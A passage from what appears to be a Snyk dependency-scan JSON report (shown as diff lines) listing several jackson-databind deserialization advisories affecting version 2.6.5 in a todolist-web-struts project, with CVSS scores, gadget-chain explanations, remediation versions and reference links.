\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + 
"socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 
8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": 
"https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + 
